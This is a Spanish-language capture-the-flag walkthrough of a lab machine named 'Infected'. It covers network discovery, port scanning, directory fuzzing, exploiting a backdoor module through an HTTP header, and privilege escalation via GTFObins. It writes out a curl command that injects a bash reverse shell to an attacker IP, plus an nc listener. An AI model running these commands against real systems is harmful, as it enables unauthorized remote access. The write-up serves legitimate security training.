Infected
Conocer la red
Lo primero de todos es encontrar equipos dentro de mi red.
sudo arp-scan -I eth0 --localnet
Como ya sabemos, las máscaras que empiezan por 00:0c son de VMware, por lo tanto la máquina atacante es la 192.168.166.104.
Conectividad con la máquina atacante
Comprobamos que tenemos conectividad.
ping -c1 192.168.166.104
Vemos que el ttl es 64 por lo que significa que es una máquina Linux.
Escaneo de puertos
Ahora vamos a hacer un escáneo para ver los puertos que están abiertos
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -vvv -Pn 192.168.166.104 -oN allPorts
Podemos ver que utiliza para el puerto 80 Apache. Lo confirmamos buscando en el navegador la IP atacante.
Fuzzing
Lo que se me ocurre ahora mismo es hacer Fuzzing para encontrar directorios o subdirectorios. Se pueden utilizar gobuster, wfuzz. En mi caso voy a utilizar gobuster.
sudo gobuster dir -w /usr/share/wordlist/Seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php,.py,.html -u "http://192.168.166.104/"
Encontramos un info.php. Lo buscamos en el navegador.
Vemos que hay un módulo bastante sospechoso llamado backdoor o puerta trasera.
Podemos ejecutar comandos de manera remota (RCE).
Vemos que si podemos ejecutar. Por lo tanto lo que se me ocurre en estos momentos es hacer una reverse shell.
curl -sX GET -H "Backdoor: bash -c 'bash -i >& /dev/tcp/192.168.166.103/443 0>&1'" "http://192.168.166.104"
Pero antes nos ponemos en escucha.
nc -nlvp 443
Y ahora sí le damos.
Volvemos la reverse shell útil y cómoda.
script /dev/null -c bash
CTRL + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export BASH=bash
Podemos ejecutar service como laurent. Buscamos el binario en GTfobins.
Y seguimos los pasos
Una vez hechos los pasos, buscamos la flag.
Ahora vamos a por la de root.
Vemos que podemos ejecutar como root el comando joe.
Volvemos a buscar en GTfobins.
Seguimos los pasos.
Y buscamos la flag.
Encontramos las dos flag.
Última actualización